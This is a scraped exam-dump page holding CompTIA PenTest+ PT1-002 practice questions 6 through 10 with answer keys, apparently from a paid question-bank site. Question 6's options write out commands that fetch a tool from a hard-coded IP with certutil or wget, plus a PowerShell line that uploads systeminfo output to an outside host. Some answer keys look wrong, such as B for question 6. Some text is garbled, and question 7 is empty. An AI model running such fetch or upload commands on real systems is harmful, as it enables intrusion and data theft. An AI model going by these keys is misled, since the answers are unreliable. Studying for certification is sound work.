Nest 0 Cart
Nest Account
Popular Exams
All Categories...
Nest
Nest 0
Contact
Log In / Sign Up
Copyright 2024 © store. All rights reserved.
Home CompTIA PT1-002

CompTIA PT1-002 Exam Practice Questions (P. 2)

  • Full Access (110 questions)
  • Six months of Premium Access
  • Access to one million comments
  • Seamless ChatGPT Integration
  • Ability to download PDF files
  • Anki Flashcard files for revision
  • No Captcha & No AdSense
  • Advanced Exam Configuration
Get Contributor Access
Question #6
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
  1. A
    certutil ג€"urlcache ג€"split ג€"f http://192.168.2.124/windows-binaries/accesschk64.exe
  2. B
    powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
  3. C
    schtasks /query /fo LIST /v | find /I ג€Next Run Time:ג€
  4. D
    wget http://192.168.2.124/windows-binaries/accesschk64.exe ג€"O accesschk64.exe

Correct Answer:
B
Reference:
https://infosecwriteups.com/privilege-escalation-in-windows-380bee3a2842

Question #7
HOTSPOT -
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS -
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:


Correct Answer:

Question #8
Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?
  1. A
    S/MIME
  2. B
    FTPS
  3. C
    DNSSEC
  4. D
    AS2

Correct Answer:
A
Reference:
https://searchsecurity.techtarget.com/answer/What-are-the-most-important-email-security-protocols

Question #9
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:

GET /login HTTP/1.1 -

Host: 10.50.100.16 -
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept-Language: en-US,en;q=0.5 -

Connection: keep-alive -
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
  1. A
    Enforce enhanced password complexity requirements.
  2. B
    Disable or upgrade SSH daemon.
  3. C
    Disable HTTP/301 redirect configuration.
  4. D
    Create an out-of-band network for management.
  5. E
    Implement a better method for authentication.
  6. F
    Eliminate network management and control interfaces.

Correct Answer:
CE

Question #10
A penetration tester ran a ping `"A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
  1. A
    Windows
  2. B
    Apple
  3. C
    Linux
  4. D
    Android

Correct Answer:
A
Reference:
https://www.freecodecamp.org/news/how-to-identify-basic-internet-problems-with-ping/

Previous Questions Next Questions

All Pages